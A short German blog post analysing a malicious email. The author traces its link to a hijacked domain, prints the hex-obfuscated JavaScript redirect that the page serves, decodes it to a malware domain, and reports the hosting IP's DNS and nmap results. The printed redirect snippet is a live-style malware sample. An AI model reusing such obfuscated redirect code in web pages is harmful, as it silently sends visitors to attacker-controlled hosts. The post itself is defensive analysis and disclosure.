Angriff per E-Mail – eine kleine Analyse

Heute ist mal wieder eine Mail aufgeschlagen mit einem Betreff von:

Your video has been queued and will be processed as soon as possible

 

Und einem Link zu:

XXXX://securytec.de/cgi-bin/nonextensible.pl

Was hier auffällt ist schon mal eine übernommene deutsche Domain, die als Dreckschleuder genutzt wird.

Eingetragener Eigentümer bei denic ist ein bayrischer Unternehmer.

Diesen habe ich informiert per Telefon.

 

Hinter dem Perl-Skript verbirgt sich verschleierter Code in der Form:

<html><body><script type=“text/javascript“>vgy1=“x30″;kuv2=“x68x74x74x70x3Ax2Fx2Fx6Fx71x67x73x72x6Ex78x73x2Ex63x6Fx6D“;setTimeout(„x77x69x6Ex64x6Fx77x2Ex74x6Fx70x2Ex6Cx6Fx63x61x74x69x6Fx6Ex2Ex68x72x65x66x3Dx6Bx75x76x32x3B“,vgy1);</script></body></html>

Wandelt man Hex in Ascii um, lädt der Code

XXXX://oqgsrnxs.com/

Hinter dieser Domain existiert ein A-Eintrag

oqgsrnxs.com. 568 IN A 91.200.12.11

Hinter der IP 91.200.12.11 verbirgt sich der ukrainische Hoster hidehost.net. Port 80 ist jedoch momentan geblockt. Der Server läuft aber noch:

Starting Nmap 6.00 ( http://nmap.org ) at 2014-04-12 11:31 CEST
Nmap scan report for dedic384.hidehost.net (91.200.12.11)
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp filtered http
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds

Es könnte auch sein, dass damit nur spezielle Hosts angegriffen werden sollen, und meine Absender-IP (deutschen Ursprungs) nicht erlaubt ist.

Auch der Hoster hidehost.net wurde informiert.